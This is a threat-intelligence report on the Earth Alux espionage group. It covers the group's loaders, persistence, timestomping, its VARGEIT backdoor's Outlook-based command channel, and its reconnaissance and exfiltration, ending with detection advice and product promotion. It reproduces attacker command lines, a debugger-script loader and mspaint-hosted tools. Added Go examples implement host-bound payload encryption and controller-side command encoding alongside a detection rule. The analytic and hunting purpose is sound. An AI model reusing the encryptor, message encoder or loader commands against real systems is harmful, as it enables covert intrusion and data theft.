The Espionage Toolkit of Earth Alux: A Closer Look at its Advanced Techniques


Original Text

By: Lenart Bermejo, Ted Lee, Theo Chen
March 31, 2025

Key takeaways:

  • Trend Research's consistent monitoring and investigation efforts have uncovered Earth Alux's stealthy activities and advanced techniques. One of the tools in the arsenal of this advanced persistent threat (APT) group is its primary backdoor, VARGEIT.
  • Left undetected, the attack can maintain a foothold in the system and carry out cyberespionage. The long-term collection and exfiltration of data could lead to far-reaching consequences, such as disrupted operations and financial losses.
  • The attacks target the Asia-Pacific (APAC) and Latin American regions, hitting key sectors such as government, technology, logistics, manufacturing, telecommunications, IT services, and retail.
  • Regular patching and updating, vigilant monitoring for any signs of compromise, and proactive protection can help prevent such threats from infiltrating organizations' systems.

The Earth Alux APT group's schemes and tactics have been uncloaked through our relentless monitoring and investigation efforts. The China-linked intrusion set is actively launching cyberespionage attacks against the government, technology, logistics, manufacturing, telecommunications, IT services, and retail sectors. The first sighting of its activity was in the second quarter of 2023; back then, it was predominantly observed in the APAC region. Around the middle of 2024, it was also spotted in Latin America. Earth Alux has also been observed to conduct regular tests of some of its toolsets to ensure stealth and longevity in the target environment.

Overview of an Earth Alux attack

To gain entry into the system, Earth Alux mostly exploits vulnerable services in exposed servers. It then implants web shells such as GODZILLA to facilitate the delivery of its backdoors.
Earth Alux has mainly used VARGEIT as its primary backdoor and control tool, along with COBEACON. VARGEIT is used as a first-, second-, and/or later-stage backdoor, while COBEACON is employed as a first-stage backdoor. The stage is distinguishable by the way VARGEIT is loaded: the first stage is loaded via a debugger script run by cdb.exe, while later stages use DLL side-loading, which can include execution guardrails and timestomping via RAILLOAD (the loader component) and RAILSETTER (the installation and timestomping tool). VARGEIT is also the chief means by which Earth Alux runs supplemental tools for tasks such as lateral movement and network discovery in a fileless manner. Among its backdoor functions is the ability to load tools directly from its command-and-control (C&C) server into a spawned mspaint process. As a result, several mspaint processes can be observed performing tasks for the backdoor, including network reconnaissance, collection, and exfiltration.

Figure 1. Overview of Earth Alux

Earth Alux TTPs

Earth Alux employs a variety of advanced tactics, techniques, and procedures (TTPs) to facilitate its scheme. Below is a detailed view of each phase of the attack.

Initial access

Earth Alux primarily exploits vulnerable services in exposed servers to gain initial access and to implant web shells such as GODZILLA, which then deliver its first-stage backdoors.

Execution, persistence, and defense evasion

Upon gaining control via the implanted web shell, Earth Alux installs a first-stage backdoor (either COBEACON or VARGEIT) via different loading methods.

COBEACON

Popular among many threat actors, COBEACON is also among the tools used by Earth Alux. It is primarily used as a first-stage backdoor and is loaded either as an encrypted payload of the DLL side-loaded MASQLOADER or as shellcode using RSBINJECT.
COBEACON loader – MASQLOADER

The first observed loading method used to execute COBEACON payloads is MASQLOADER, a DLL side-loaded loader. It decrypts its payload with a substitution cipher: the encrypted payload consists of 1- to 3-character strings, each of which maps to a byte value through MASQLOADER's substitution table.

Figure 2. MASQLOADER loading sequence
Figure 3. Encrypted payload
Figure 4. Substitution cipher array

Later MASQLOADER versions also added an anti-API-hooking technique. The loader overwrites the code section of ntdll.dll in its own memory space with the code section of ntdll.dll read directly from the file on disk, replacing any API hooks inserted by monitoring and security tools with the original code. This lets MASQLOADER and the injected payload evade detections that rely on intercepted API calls. Note that this defeats user-mode inline hooks only: kernel callbacks and ETW-based telemetry are unaffected, and changing the page protection of ntdll's code section and writing to it are themselves observable events.

Figure 5. Anti-API hooking of MASQLOADER

Our telemetry suggests MASQLOADER is also being used by groups other than Earth Alux. Additionally, the difference in MASQLOADER's code structure compared to tools such as RAILSETTER and RAILLOAD suggests that MASQLOADER is developed separately from those toolsets.

COBEACON loader – RSBINJECT

Another tool Earth Alux uses to load COBEACON is RSBINJECT, a Rust-based command-line shellcode loader. It has no decryption routine and loads shellcode directly. Instead, it has features that help test shellcode through optional flags and subcommands.

Figure 6. RSBINJECT flags and subcommands

While RSBINJECT has been observed in attacks, its functionality suggests that it also doubles as a shellcode testing tool. Like MASQLOADER, this tool is likely not exclusive to Earth Alux.

First stage VARGEIT execution – CDB

First-stage VARGEIT is executed via shellcode injection using a debugger script.
This method uses cdb.exe (renamed fontdrvhost.exe when dropped by the web shell) as both the debugger and the host process, running the script in the manner documented by the LOLBAS project. The debugger script config.ini contains both a loader shellcode and the VARGEIT code. This produces the following command line:

C:\programdata\fontdrvhost.exe -cf c:\programdata\config.ini -o c:\programdata\fontdrvhost.exe

Here -cf names the script cdb runs at startup, -o tells it to also debug child processes, and the trailing path is the executable to debug; since that executable is the renamed cdb.exe itself, the injected VARGEIT shellcode ends up running inside a second instance of the debugger.

This loading method is commonly used for the first-stage backdoor installation, delivered via the initial access methods (typically exploitation of externally exposed servers), and is often observed installing second- and later-stage VARGEIT. A variation of this method uses a shellcode that loads an encrypted VARGEIT payload from a separate file component.

Second stage VARGEIT execution – DLL side-loading

Second-stage VARGEIT is executed via DLL side-loading with the RAILLOAD loader tool. This method is often used for second- or later-stage installations and can have execution guardrails implemented in RAILLOAD, as well as evasive measures applied by RAILSETTER.

RAILLOAD as second stage VARGEIT loader

RAILLOAD is a loader tool executed via DLL side-loading and used for second-stage loading.

Figure 7. RAILLOAD loading sequence

This tool comes with its own configuration and has been seen to take its payload from a variety of components, either an encrypted file or a registry location. The RAILLOAD configuration is base64-encoded and contains fields separated by "||":

File-based configuration: ||||
Registry-based configuration: ||||||

RAILLOAD decryption and execution guardrails

RAILLOAD's decryption routine is base64 decoding followed by AES-128 decryption in CBC mode. Some variants add execution guardrails here. For example, if the config does not contain an AES key (the field can be left blank), RAILLOAD uses information from the infected machine's registry as the decryption key, so the payload only decrypts on the host it was built for.
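The decryption chain just described (base64, then AES-128-CBC, with the key taken from the config or, when that field is blank, from the first 16 bytes of a host-specific registry string; the article names the values used below), as an added example in Go. This is not RAILLOAD's own code: the registry strings, the payload bytes, the PKCS#7 padding and the IV-prepended ciphertext layout are all constructed assumptions made for the example.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"encoding/base64"
	"errors"
	"fmt"
)

// railloadKey reproduces the guardrail: a non-blank config key is used as-is,
// a blank one falls back to the first 16 bytes of a machine-specific registry
// string (MachineGuid or ProductID in the article's description).
func railloadKey(configKey, registryValue string) ([]byte, error) {
	if configKey != "" {
		if len(configKey) != aes.BlockSize {
			return nil, errors.New("config key must be 16 bytes for AES-128")
		}
		return []byte(configKey), nil
	}
	if len(registryValue) < aes.BlockSize {
		return nil, errors.New("registry value too short to use as key")
	}
	return []byte(registryValue[:aes.BlockSize]), nil
}

func pkcs7Unpad(b []byte) ([]byte, error) {
	if len(b) == 0 {
		return nil, errors.New("empty plaintext")
	}
	n := int(b[len(b)-1])
	if n == 0 || n > aes.BlockSize || n > len(b) {
		return nil, errors.New("bad padding")
	}
	for _, c := range b[len(b)-n:] {
		if int(c) != n {
			return nil, errors.New("bad padding")
		}
	}
	return b[:len(b)-n], nil
}

// decryptPayload is the loader side: base64, then AES-128-CBC. The article
// does not say where the IV lives; this example assumes it is the first block.
func decryptPayload(b64 string, key []byte) ([]byte, error) {
	raw, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return nil, err
	}
	if len(raw) < 2*aes.BlockSize || len(raw)%aes.BlockSize != 0 {
		return nil, errors.New("ciphertext length is not a multiple of the block size")
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	iv, ct := raw[:aes.BlockSize], raw[aes.BlockSize:]
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	return pkcs7Unpad(pt)
}

// encryptPayload is the operator-side counterpart, used here only to build a
// payload bound to one victim's registry value.
func encryptPayload(pt, key []byte) (string, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return "", err
	}
	n := aes.BlockSize - len(pt)%aes.BlockSize
	padded := append(append([]byte{}, pt...), bytes.Repeat([]byte{byte(n)}, n)...)
	out := make([]byte, aes.BlockSize+len(padded))
	if _, err := rand.Read(out[:aes.BlockSize]); err != nil {
		return "", err
	}
	cipher.NewCBCEncrypter(block, out[:aes.BlockSize]).CryptBlocks(out[aes.BlockSize:], padded)
	return base64.StdEncoding.EncodeToString(out), nil
}

// unlocksOn reports whether a payload decrypts to the expected bytes on a host
// whose registry carries the given value (blank config key, so the host key is used).
func unlocksOn(b64, registryValue string, want []byte) bool {
	key, err := railloadKey("", registryValue)
	if err != nil {
		return false
	}
	pt, err := decryptPayload(b64, key)
	return err == nil && bytes.Equal(pt, want)
}

func main() {
	// Constructed MachineGuid-style strings; neither belongs to a real host.
	const victim = "3f2a9c1e-7b44-4d8e-9a61-5c0d2e8f1b77"
	const other = "9d8e7f6a-5b4c-4d3e-8f2a-1b0c9d8e7f6a"
	stage := []byte("MZ... constructed stand-in for the encrypted VARGEIT stage")
	key, _ := railloadKey("", victim)
	enc, _ := encryptPayload(stage, key)
	fmt.Println("decrypts on victim:", unlocksOn(enc, victim, stage)) // true
	fmt.Println("decrypts elsewhere:", unlocksOn(enc, other, stage))  // false
}
```

The practical consequence for offline analysis is that a RAILLOAD payload with a blank config key cannot be decrypted from the sample alone; the analyst needs the MachineGuid or ProductID string from the victim's SOFTWARE hive, and a payload lifted from one host will not open with another host's values.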
In older variants, the first 16 bytes of HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid are used; newer variants use the first 16 bytes of HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProductID instead. For offline analysis this means the payload can only be decrypted with the MachineGuid or ProductID value taken from the victim's SOFTWARE hive.

RAILSETTER for persistence and timestomping

RAILSETTER is a persistence installer component designed to work with RAILLOAD. Its main functions include:

  • Copying and renaming RAILLOAD's intended host from c:\windows\system32 to the intended target directory
  • Timestomping the create, access, and modify times of RAILLOAD and its host
  • Creating a scheduled task for persistence

RAILSETTER also has a base64-encoded configuration, which contains the information needed to perform its functions. The configuration is structured as follows:

||||||||
||||||||

The component's execution flow is illustrated below:

Figure 8. RAILSETTER execution flow

RAILSETTER has been designed to be loaded via regsvr32.exe. Its host is deployed in the same way as RAILLOAD's host: a relocated and renamed copy of a file that already exists on the system. In later incidents involving Earth Alux, RAILSETTER no longer lands as a file but is instead executed via VARGEIT's mspaint injection method.

Backdoor and Command & Control

The majority of Earth Alux's activities in these stages are handled using VARGEIT's features, one of which brings in miscellaneous tools. VARGEIT is a multi-channel configurable backdoor; the channels below, which are mostly for communication, can be set in the configuration:

ID    Channel
0x00  HTTP
0x01  Reverse TCP
0x02  Reverse UDP
0x03  Bind TCP
0x04  Bind HTTP
0x05  Outlook
0x06  ICMP
0x07  DNS
0x08  Web
0x09  Bind SMB

Table 1. VARGEIT channels

The Outlook channel, which uses the Microsoft Graph API, is predominantly used in all observed attacks. Later variants also include versions where the Outlook channel is the only option. Graph API enables authorized access to a user's Outlook mail data, allowing email-related operations such as reading, sending, and managing emails, as well as accessing calendar events and contacts from primary and shared mailboxes. Because the backdoor authenticates with a stored refresh token and exchanges messages through Microsoft's Graph endpoints, its C&C traffic blends into ordinary Microsoft 365 traffic; the mailbox activity (drafts created and deleted by an unexpected client) and the token itself are the artifacts to hunt for.

VARGEIT's configuration can also vary depending on the channel used. The Outlook channel type configuration contains the following information:

Offset  Size             Value
0x00    ~(up to 0x1388)  Refresh token for MS Auth
0x1388  ~(up to 0xC8)    URL for backup refresh token
0x1450  0x10             GUID used as registry data where the (auth) token is stored
0x1478  0x02             Unknown ID added to the communication message at offset 0x2B
0x147a  0x04             Unknown DWORD value
0x147e  0x01             Channel byte; decides which communication channel will be used
0x147f  0x10             AES-128 key used for message decryption/encryption
0x148f  0x01             Flag to get external IP or not
0x1490  0x01             Unknown byte
0x1491  0x01             Exit byte
0x1492  0x04             Unknown DWORD value

Table 2. VARGEIT Outlook channel type configuration

In later versions of the backdoor, the URL for the backup refresh token and the GUID used as registry data for auth token storage have been removed from the configuration, shifting the offsets of the remaining fields.

Using Graph API, the Outlook communication channel uses the Drafts folder for message exchanges between the backdoor and the controller.
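The draft-folder exchange just described, carried through to the byte level using the header layouts the article gives below (Tables 3, 4 and 5) and the FNV-1a message ID, as an added example in Go that is not VARGEIT's or the controller's code. The AES key and instance GUID are constructed stand-ins for config values; the IV, PKCS#7 padding, little-endian integers, and the reading of the two size fields as "ciphertext length" and "bytes after the command ID" are assumptions, since the article states only "AES-128 CBC" and names the fields.

```go
package main

import (
	"bytes"
	"compress/zlib"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"encoding/base64"
	"encoding/binary"
	"errors"
	"fmt"
	"hash/fnv"
	"io"
	"strconv"
)

// Constructed stand-ins for what a sample carries in its config (Table 2): the
// AES-128 key and the per-instance GUID. The IV and PKCS#7 padding are assumptions.
var (
	aesKey       = []byte("0123456789abcdef")
	aesIV        = []byte("fedcba9876543210")
	instanceGUID = "1b4e28ba-2fa1-11d2-883f-0016d3cca427"
)

const (
	padLen  = 0x1e // random bytes opening the Table 3 header
	hdrLen  = 0x2a // Table 3: pad + u32 size + u64 message ID
	argsOff = 0x11 // Table 4: command arguments begin here
)

// messageID is the FNV-1a 64-bit hash of the GUID: decimal in the draft title, hex in the header.
func messageID(guid string) uint64 {
	h := fnv.New64a()
	h.Write([]byte(guid))
	return h.Sum64()
}

// draftTitle yields "r_<id>" for controller messages and "p_<id>" for backdoor ones.
func draftTitle(prefix string, id uint64) string { return prefix + strconv.FormatUint(id, 10) }

// encodeServerMessage is the controller side: Table 4 payload -> zlib ->
// AES-128-CBC -> Table 3 header -> base64, i.e. the draft body of Figure 10.
func encodeServerMessage(id uint64, cmdID byte, args []byte) (string, error) {
	body := make([]byte, argsOff+len(args))
	binary.LittleEndian.PutUint32(body[0x00:], uint32(len(body)))      // uncompressed size
	binary.LittleEndian.PutUint32(body[0x04:], uint32(len(body)-0x09)) // bytes after the command ID
	body[0x08] = cmdID                                                 // 0x09..0x10 left zero ("unknown")
	copy(body[argsOff:], args)
	var z bytes.Buffer
	w := zlib.NewWriter(&z)
	w.Write(body)
	w.Close()
	n := aes.BlockSize - z.Len()%aes.BlockSize
	ct := append(z.Bytes(), bytes.Repeat([]byte{byte(n)}, n)...)
	block, _ := aes.NewCipher(aesKey) // key length is fixed at 16 above
	cipher.NewCBCEncrypter(block, aesIV).CryptBlocks(ct, ct)
	hdr := make([]byte, hdrLen)
	rand.Read(hdr[:padLen])
	binary.LittleEndian.PutUint32(hdr[0x1e:], uint32(len(ct)))
	binary.LittleEndian.PutUint64(hdr[0x22:], id)
	return base64.StdEncoding.EncodeToString(append(hdr, ct...)), nil
}

// decodeServerMessage is the backdoor side: it ignores messages addressed to
// another instance, checks the size field, then decrypts and inflates.
func decodeServerMessage(b64 string, wantID uint64) (byte, []byte, error) {
	raw, err := base64.StdEncoding.DecodeString(b64)
	if err != nil || len(raw) < hdrLen {
		return 0, nil, errors.New("short or malformed message")
	}
	if id := binary.LittleEndian.Uint64(raw[0x22:]); id != wantID {
		return 0, nil, fmt.Errorf("message ID %x belongs to another instance", id)
	}
	ct := raw[hdrLen:]
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 || int(binary.LittleEndian.Uint32(raw[0x1e:])) != len(ct) {
		return 0, nil, errors.New("size field does not match ciphertext")
	}
	block, _ := aes.NewCipher(aesKey)
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, aesIV).CryptBlocks(pt, ct)
	if n := int(pt[len(pt)-1]); n == 0 || n > aes.BlockSize {
		return 0, nil, errors.New("bad padding")
	} else {
		pt = pt[:len(pt)-n]
	}
	r, err := zlib.NewReader(bytes.NewReader(pt))
	if err != nil {
		return 0, nil, err
	}
	body, err := io.ReadAll(r)
	if err != nil || len(body) < argsOff || int(binary.LittleEndian.Uint32(body)) != len(body) {
		return 0, nil, errors.New("malformed command payload")
	}
	return body[0x08], body[argsOff:], nil
}

func main() {
	id := messageID(instanceGUID)
	msg, _ := encodeServerMessage(id, 0x01, []byte("C:\\programdata\\data"))
	cmd, args, err := decodeServerMessage(msg, id)
	fmt.Println(draftTitle("r_", id), cmd, string(args), err)
}
```

For an analyst with a captured draft and the AES key from the config, decodeServerMessage is the whole decoding path; the message-ID check is what lets several backdoor instances share one mailbox without reading each other's commands, and it is also why the decimal ID in the draft title is a per-host pivot when reviewing mailbox audit logs.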
Backdoor messages are prefixed with p_, while messages from the controller are prefixed with r_. Messages processed by the backdoor are also deleted to remove traces, and based on observation, the controller likely does the same:

Figure 9. VARGEIT and controller interaction

Server message

The message from the C&C server is prefixed with r_. A message ID allows the controller to keep track of the backdoor instance being controlled and lets the backdoor instance identify which message it should read. The message ID is generated per backdoor instance as the FNV-1a 64-bit hash of a randomly generated GUID. The decimal form of the hash is used in the message title, while the hex form is also embedded in the communication packet. The server message body contains the actual communication data, which is encrypted using AES-128 in CBC mode and compressed using zlib. It is then stored as a base64-encoded string within the message body.

Figure 10. Server message example
Figure 11. Decoded message from the C&C server

The base64-decoded layer has a header structure, and the encrypted data starts at offset 0x2a:

Offset  Size  Value
0x00    0x1e  Randomly generated padding bytes (first unboxed sequence)
0x1e    0x04  Size of the byte array (boxed in red)
0x22    0x08  Message ID in hex (boxed in yellow)
0x2a    ~     Start of encrypted data (boxed in black)

Table 3. Communication header structure

Figure 12. Decrypted data from C&C

Offset  Size  Data
0x00    0x04  Size of the uncompressed message (first unboxed sequence)
0x04    0x04  Size of the remaining data passed as a parameter to the corresponding command's function (boxed in red)
0x08    0x01  Command ID (boxed in yellow)
0x09    0x08  Unknown (boxed in black)
0x11    ~     Start of additional arguments, varying with the command ID (boxed in white)

Table 4. Decrypted communication data structure

Figure 13. VARGEIT backdoor message example
Figure 14. Decoded message from the backdoor

The backdoor message shares a similar structure with the server message, with some additional data in the message header block:

Offset  Size  Data
0x00    0x1e  Randomly generated padding bytes
0x1e    0x04  Total size of the byte array
0x22    0x01  Unknown communication flag: 0x00 for a message with empty content, 0x01 for a response to the collect-message-ID command
0x23    0x08  Message ID in hex
0x2b    0x08  ID from config offset 0x1478 (a WORD in the config, but allocated as a QWORD when sent to the server)
0x33    ~     Start of the encrypted data to be sent

Table 5. Decoded communication header structure

The encrypted data has a structure that varies based on which command the backdoor is responding to.

Figure 15. Decrypted data from the backdoor

The example in the image above is a response to the system information collection command; it shows the username, computer name, external IP address, internal IP address, OS version, user admin flag, host process name, and host process ID.

VARGEIT capabilities

VARGEIT's backdoor capabilities are as follows:

  • Collect system information
  • Communicate using different channels
  • Interact with Windows Defender Firewall
  • Collect drive information
  • Collect running process information
  • Get, set, search, create, and delete directories
  • Read and write files
  • Execute command lines
  • Inject miscellaneous tools into a controlled mspaint or conhost instance

Attackers use the mspaint injection to execute additional tools from the C&C server directly on the target machine without the tool ever landing on disk. VARGEIT opens an instance of mspaint into which shellcode from the C&C server is injected. Code injection and execution use VirtualAllocEx, WriteProcessMemory, and RtlCreateUserThread. For command-line tools, VARGEIT creates an anonymous pipe from which the output can be read and sent back to the controller. For injected tools that require interaction, the backdoor uses a named pipe. It is also worth noting that VARGEIT can launch multiple instances of mspaint to host tools.

Figure 16. Method 1: Executing the remote code
Figure 17. Method 2: Reading the output of the tool via an anonymous pipe
Figure 18. Method 3: Interacting with the injected process via a named pipe

Discovery, collection, and exfiltration

Various activities can be performed in these stages of the attack:

Installation

In more recent attacks, Earth Alux has changed the deployment method of RAILSETTER, one of its persistence installation tools. Previously deployed as a DLL file loaded via regsvr32.exe, the tool is now executed via the mspaint method. Though there is no distinguishing argument on the mspaint process, RAILSETTER's installation and timestomping behavior can be observed to originate from it.

Discovery

Earth Alux deploys tools that appear to perform security event log and group policy discovery, as well as network/LDAP reconnaissance. An mspaint process performing security event log and group policy discovery can show the following command line:

C:\Windows\System32\mspaint.exe Aslire597

An mspaint process performing network/LDAP reconnaissance can be seen with the following arguments:

C:\Windows\System32\mspaint.exe sElf98RqkF ldap

The network/LDAP reconnaissance process can also generate files containing network information. These are created inside a folder under the data path named after the domain and a timestamp (for example, c:\programdata\data\ad.domain.name_20241111062500). The following files can be created under this path:

adcs.txt
admin.keyword.users.txt
all.dc.host.txt
all.dns.record.txt
all.exchange.host.txt
all.gpo.txt
all.group.user.txt
all.host.txt
all.mssql.host.txt
all.old.host.txt
all.ou.txt
all.spn.txt
all.trusted.domain.txt
all.trusted.txt
all.user.workstations.host.txt
all.users.txt
as-rep_roasting.txt
delegation.host.txt
delegation.users.txt
disabled.users.txt
domain.admin.groups.txt
domain.adminsdholder.users.txt
locked.users.txt
neverexpire.users.txt
password_policy.txt
unconstrained_delegation.host.txt
unconstrained_delegation.users.txt

These files are then archived under the data path (c:\programdata\data in the example) with the filename ad.domain.name_20241111062500.zip. The file names map directly onto the Active Directory enumeration an attacker wants before moving laterally (AS-REP roastable accounts, unconstrained delegation, AdminSDHolder-protected users, SPNs, trusts), so their presence on disk, or a zip named after the domain and a timestamp under ProgramData, is a useful hunting artifact.

Collection

Earth Alux loads what is possibly a custom compression tool into mspaint for collection purposes. The process has the following arguments and produces a compressed file with the extension .tar.gz:

C:\Windows\System32\mspaint.exe

Among the collected files are those produced during the discovery stage.

Exfiltration

Earth Alux also deploys an exfiltration tool via this method to exfiltrate the compressed file created during the collection stage.
Here, it displays the following arguments:

C:\Windows\System32\mspaint.exe gWgGfsq1PcUUoo dm9TTlEwM0NXRkF3TXRkM3RVSHg3SGQ3TDl4YVNRNGY=

It is interesting to note that the exfiltrated data is sent to an attacker-controlled cloud storage bucket. Based on our telemetry, Earth Alux has used the same cloud storage bucket to exfiltrate from different targets.

Testing and development

Earth Alux conducts several tests with RAILLOAD and RA ILSETTER. These include detection tests and attempts to find new hosts for DLL side-loading. DLL side-loading tests involve ZeroEye, an open-source tool popular within the Chinese-speaking community, which scans EXE files' import tables for imported DLLs that can be abused for side-loading.

Figure 19. Command line version options
Figure 20. Scan result
Figure 21. Qualified candidate output

Earth Alux pairs ZeroEye with CloneExportTable, a tool that clones the export table of a specified DLL into the export table of the DLL used for side-loading. Use of this tool usually involves cloning the desired DLL's export table into RAILLOAD samples, so that the host executable's imports resolve against the malicious DLL without loader errors.

Figure 22. CloneExportTable command
Figure 23. Example of resulting export table

Earth Alux also used VirTest, another testing tool popular among the Chinese-speaking community, for detection testing and to enhance their toolsets' evasive features. VirTest allows users to pinpoint the code in their tools that triggers file-based detections from security software and to modify that code to bypass the detections.

Figure 24. VirTest tool

Target industries

Earth Alux has predominantly targeted a diverse array of sectors, namely government, technology, logistics, manufacturing, telecommunications, IT services, and retail, reflecting its strategic focus on high-value and sensitive information across different industries. The group's activities have primarily been observed in the APAC region, specifically affecting countries such as Thailand, the Philippines, Malaysia, and Taiwan. In mid-2024, Earth Alux extended its operations to Latin America, with notable incidents reported in Brazil.

Conclusion and security recommendations

Earth Alux represents a sophisticated and evolving cyberespionage threat, leveraging a diverse toolkit and advanced techniques to infiltrate and compromise a range of sectors, particularly in the APAC region and Latin America. Its reliance on the VARGEIT backdoor, along with the use of COBEACON and various loading methods, highlights a strategic approach to maintaining stealth and persistence within target environments. The group's ongoing testing and development of its tools further indicate a commitment to refining its capabilities and evading detection. Understanding the operational methods associated with Earth Alux is crucial for developing effective defenses and mitigating the risks posed by such advanced cyber threats.

To bolster protection against APT attacks, organizations can adopt a proactive security mindset by implementing security best practices such as the following:

  • Periodically patch and update the systems in use, as attackers can take advantage of vulnerabilities to gain initial access.
  • Perform vigilant monitoring to observe unusual activity, such as uncommonly heavy network activity, reduced performance and speed, and so on.
  • Leverage solutions that help organizations take a proactive security stance and manage security holistically with comprehensive prevention, detection, and response capabilities.

As organizations continue to face the challenges posed by Earth Alux, it is imperative to enhance their cybersecurity measures, adopt proactive threat detection strategies, and remain vigilant against the evolving tactics of this persistent adversary.

Proactive security with Trend Vision One™

Trend Vision One™ is the only AI-powered enterprise cybersecurity platform that centralizes cyber risk exposure management, security operations, and robust layered protection. This comprehensive approach helps you predict and prevent threats, accelerating proactive security outcomes across your entire digital estate. Backed by decades of cybersecurity leadership and Trend Cybertron, the industry's first proactive cybersecurity AI, it delivers proven results: a 92% reduction in ransomware risk and a 99% reduction in detection time. Security leaders can benchmark their posture and showcase continuous improvement to stakeholders. With Trend Vision One, you're enabled to eliminate security blind spots, focus on what matters most, and elevate security into a strategic partner for innovation.

Trend Vision One Threat Intelligence

To stay ahead of evolving threats, Trend Vision One customers can access a range of Intelligence Reports and Threat Insights. Threat Insights helps customers stay ahead of cyber threats before they happen and allows them to prepare for emerging threats by offering comprehensive information on threat actors, their malicious activities, and their techniques. By leveraging this intelligence, customers can take proactive steps to protect their environments, mitigate risks, and effectively respond to threats.

Trend Vision One Intelligence Reports App [IOC Sweeping]
  • The Espionage Toolkit of Earth Alux: A Closer Look at its Advanced Techniques

Trend Vision One Threat Insights App
  • Threat Actor: Earth Alux
  • Emerging Threat: The Espionage Toolkit of Earth Alux: A Closer Look at its Advanced Techniques

Hunting Queries

Trend Vision One Search App

Trend Vision One customers can use the Search App to match or hunt for the malicious indicators mentioned in this blog post with data in their environment.
Earth Alux Malware

malName: (VARGEIT OR RAILLOAD OR RAILSETTER) AND eventName: MALWARE_DETECTION

More hunting queries are available for Trend Vision One customers with Threat Insights Entitlement enabled.

Indicators of Compromise (IoC)

The indicators of compromise for this entry can be found here:
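The product query above keys on detection names. The behaviours the article documents also give product-independent process-creation logic: a renamed cdb.exe driven by a -cf script (the first-stage VARGEIT loader, caught through the binary's OriginalFileName rather than its path), mspaint.exe started with opaque arguments such as "Aslire597" or "sElf98RqkF ldap" (injected tools), and regsvr32.exe loading a DLL from a user-writable directory (how RAILSETTER was originally deployed). The following added example, not part of the original post, runs those three rules over constructed Sysmon-style JSON lines; the field names follow Sysmon Event ID 1, the user-writable directory list and the regsvr32 path heuristic are assumptions, and the two command lines that match the article are reproduced from it.

```go
package main

import (
	"encoding/json"
	"fmt"
	"path/filepath"
	"strings"
)

// Event holds the process-creation fields the rules need (Sysmon Event ID 1 names).
type Event struct {
	Image            string `json:"Image"`
	OriginalFileName string `json:"OriginalFileName"`
	CommandLine      string `json:"CommandLine"`
}

// splitArgs tokenizes a Windows command line on spaces, honouring double quotes.
func splitArgs(s string) []string {
	var out []string
	var cur strings.Builder
	inQuote := false
	for _, r := range s {
		switch {
		case r == '"':
			inQuote = !inQuote
		case r == ' ' && !inQuote:
			if cur.Len() > 0 {
				out = append(out, cur.String())
				cur.Reset()
			}
		default:
			cur.WriteRune(r)
		}
	}
	if cur.Len() > 0 {
		out = append(out, cur.String())
	}
	return out
}

func baseName(p string) string {
	return strings.ToLower(filepath.Base(strings.ReplaceAll(p, `\`, "/")))
}

// userWritable flags directories a web shell can drop files into (assumed list);
// the article's loader, script and data path all sit under c:\programdata.
func userWritable(p string) bool {
	l := strings.ToLower(p)
	for _, d := range []string{`\programdata\`, `\users\`, `\temp\`, `\appdata\`} {
		if strings.Contains(l, d) {
			return true
		}
	}
	return false
}

// classify returns the names of the rules that fire for one event.
func classify(e Event) []string {
	var hits []string
	args := splitArgs(e.CommandLine)
	if len(args) == 0 {
		return nil
	}
	switch {
	case strings.EqualFold(e.OriginalFileName, "cdb.exe"):
		// cdb with a startup script (-cf), renamed or scripted from a user-writable
		// path: the fontdrvhost.exe -cf config.ini pattern from the article.
		for i, a := range args[:len(args)-1] {
			if strings.EqualFold(a, "-cf") && (baseName(e.Image) != "cdb.exe" || userWritable(args[i+1])) {
				hits = append(hits, "cdb_script_loader")
			}
		}
	case baseName(e.Image) == "mspaint.exe":
		// mspaint's only legitimate argument is an image to open; an argument with
		// no path separator or extension is an injected tool's parameter.
		for _, a := range args[1:] {
			if !strings.ContainsAny(a, `\/.`) {
				hits = append(hits, "mspaint_opaque_args")
				break
			}
		}
	case baseName(e.Image) == "regsvr32.exe":
		for _, a := range args[1:] {
			if strings.HasSuffix(strings.ToLower(a), ".dll") && userWritable(a) {
				hits = append(hits, "regsvr32_user_writable_dll")
				break
			}
		}
	}
	return hits
}

// scan parses JSON lines and returns one "<rule>: <command line>" per hit,
// skipping malformed lines rather than aborting the sweep.
func scan(lines string) []string {
	var alerts []string
	for _, ln := range strings.Split(strings.TrimSpace(lines), "\n") {
		var e Event
		if json.Unmarshal([]byte(ln), &e) != nil {
			continue
		}
		for _, rule := range classify(e) {
			alerts = append(alerts, rule+": "+e.CommandLine)
		}
	}
	return alerts
}

// sampleLog is constructed: lines 1, 3 and 4 carry the article's command lines,
// line 6 follows its regsvr32 description, the rest are benign look-alikes.
const sampleLog = `
{"Image":"C:\\programdata\\fontdrvhost.exe","OriginalFileName":"CDB.Exe","CommandLine":"C:\\programdata\\fontdrvhost.exe -cf c:\\programdata\\config.ini -o c:\\programdata\\fontdrvhost.exe"}
{"Image":"C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\cdb.exe","OriginalFileName":"CDB.Exe","CommandLine":"cdb.exe -p 4120"}
{"Image":"C:\\Windows\\System32\\mspaint.exe","OriginalFileName":"MSPAINT.EXE","CommandLine":"C:\\Windows\\System32\\mspaint.exe Aslire597"}
{"Image":"C:\\Windows\\System32\\mspaint.exe","OriginalFileName":"MSPAINT.EXE","CommandLine":"C:\\Windows\\System32\\mspaint.exe sElf98RqkF ldap"}
{"Image":"C:\\Windows\\System32\\mspaint.exe","OriginalFileName":"MSPAINT.EXE","CommandLine":"\"C:\\Windows\\System32\\mspaint.exe\" \"C:\\Users\\alice\\Pictures\\cat.png\""}
{"Image":"C:\\Windows\\System32\\regsvr32.exe","OriginalFileName":"REGSVR32.EXE","CommandLine":"regsvr32.exe /s C:\\ProgramData\\svc\\helper.dll"}
{"Image":"C:\\Windows\\System32\\regsvr32.exe","OriginalFileName":"REGSVR32.EXE","CommandLine":"regsvr32.exe /s C:\\Windows\\System32\\msxml3.dll"}
`

func main() {
	for _, a := range scan(sampleLog) {
		fmt.Println(a)
	}
}
```

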